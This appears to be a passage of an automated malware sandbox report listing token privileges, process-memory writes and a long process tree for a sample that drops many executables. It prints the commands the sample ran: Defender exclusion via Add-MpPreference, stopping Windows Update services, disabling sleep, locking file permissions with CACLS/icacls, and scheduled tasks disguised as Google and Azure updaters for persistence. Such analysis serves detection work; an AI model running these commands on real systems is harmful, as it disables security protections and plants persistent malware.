Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 3144 wrote to memory of 4464 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 4464 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 4464 wrote to memory of 4688 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4464 wrote to memory of 4688 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4464 wrote to memory of 4688 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3144 wrote to memory of 220 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 220 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 220 wrote to memory of 5032 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 220 wrote to memory of 5032 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 220 wrote to memory of 5032 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3144 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3D65.exe
PID 3144 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3D65.exe
PID 3144 wrote to memory of 4660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\3D65.exe
PID 3144 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\40B2.exe
PID 3144 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\40B2.exe
PID 3144 wrote to memory of 4356 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\40B2.exe
PID 3144 wrote to memory of 4572 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4268.exe
PID 3144 wrote to memory of 4572 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4268.exe
PID 3144 wrote to memory of 4572 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4268.exe
PID 3144 wrote to memory of 1404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 3144 wrote to memory of 1404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 3144 wrote to memory of 1404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 3144 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5EFB.exe
PID 3144 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5EFB.exe
PID 3144 wrote to memory of 468 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5EFB.exe
PID 3144 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\61EA.exe
PID 3144 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\61EA.exe
PID 3144 wrote to memory of 5096 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\61EA.exe
PID 3144 wrote to memory of 4328 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3144 wrote to memory of 4328 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3144 wrote to memory of 4328 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3144 wrote to memory of 3084 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3144 wrote to memory of 3084 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3144 wrote to memory of 3084 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3144 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 3144 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 3144 wrote to memory of 536 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 468 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 468 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 468 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 468 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 468 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe C:\Users\Admin\AppData\Local\Temp\latestplayer.exe
PID 3144 wrote to memory of 1076 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 3144 wrote to memory of 1076 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 4980 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4980 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4980 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 1076 wrote to memory of 2596 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1076 wrote to memory of 2596 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1076 wrote to memory of 2596 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3144 wrote to memory of 4308 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3144 wrote to memory of 4308 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3144 wrote to memory of 4308 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3144 wrote to memory of 212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\996B.exe
PID 3144 wrote to memory of 212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\996B.exe
PID 3144 wrote to memory of 212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\996B.exe
PID 4924 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 4924 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 4924 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 3144 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9D73.exe
PID 3144 wrote to memory of 4476 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9D73.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\366E.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\366E.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\3824.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\3824.dll

C:\Users\Admin\AppData\Local\Temp\3D65.exe

C:\Users\Admin\AppData\Local\Temp\3D65.exe

C:\Users\Admin\AppData\Local\Temp\40B2.exe

C:\Users\Admin\AppData\Local\Temp\40B2.exe

C:\Users\Admin\AppData\Local\Temp\4268.exe

C:\Users\Admin\AppData\Local\Temp\4268.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\5EFB.exe

C:\Users\Admin\AppData\Local\Temp\5EFB.exe

C:\Users\Admin\AppData\Local\Temp\61EA.exe

C:\Users\Admin\AppData\Local\Temp\61EA.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

"C:\Users\Admin\AppData\Local\Temp\latestplayer.exe"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8C1A.dll

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\8C1A.dll

C:\Users\Admin\AppData\Local\Temp\996B.exe

C:\Users\Admin\AppData\Local\Temp\996B.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Users\Admin\AppData\Local\Temp\9D73.exe

C:\Users\Admin\AppData\Local\Temp\9D73.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\C698.exe

C:\Users\Admin\AppData\Local\Temp\C698.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3328 -ip 3328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 816

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Roaming\evuvcij

C:\Users\Admin\AppData\Roaming\evuvcij

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Users\Admin\AppData\Local\Temp\3302.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\a8e00b3b-feb7-4dae-ba08-83e179d90546" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4572 -ip 4572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 1124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4356 -ip 4356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 1124

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

C:\Users\Admin\AppData\Local\Temp\64AA.exe

"C:\Users\Admin\AppData\Local\Temp\64AA.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\78EF.exe

C:\Users\Admin\AppData\Local\Temp\6E21.exe

"C:\Users\Admin\AppData\Local\Temp\6E21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

"C:\Users\Admin\AppData\Local\Temp\5AE3.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\78EF.exe

"C:\Users\Admin\AppData\Local\Temp\78EF.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Users\Admin\AppData\Local\Temp\B949.exe

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Users\Admin\AppData\Local\Temp\8F29.exe

C:\Users\Admin\AppData\Local\Temp\B949.exe

"C:\Users\Admin\AppData\Local\Temp\B949.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\8F29.exe

"C:\Users\Admin\AppData\Local\Temp\8F29.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 1120

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\3302.exe

"C:\Users\Admin\AppData\Local\Temp\3302.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\78EF.exe

"C:\Users\Admin\AppData\Local\Temp\78EF.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\6E21.exe

"C:\Users\Admin\AppData\Local\Temp\6E21.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5AE3.exe

"C:\Users\Admin\AppData\Local\Temp\5AE3.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\64AA.exe

"C:\Users\Admin\AppData\Local\Temp\64AA.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\B949.exe

"C:\Users\Admin\AppData\Local\Temp\B949.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build3.exe

"C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build3.exe"

C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe

"C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe"

C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe

"C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe

"C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build3.exe

"C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build3.exe"

C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build3.exe

"C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build3.exe"

C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build3.exe

"C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build3.exe"

C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe

"C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe

"C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe

"C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe"

C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe

"C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe"

C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe

"C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe"

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Users\Admin\AppData\Local\Temp\8F29.exe

"C:\Users\Admin\AppData\Local\Temp\8F29.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe

"C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe"

C:\Users\Admin\AppData\Local\Temp\3302.exe

"C:\Users\Admin\AppData\Local\Temp\3302.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe

"C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe"

C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build3.exe

"C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe

"C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe"

C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe

"C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe"

C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build3.exe

"C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

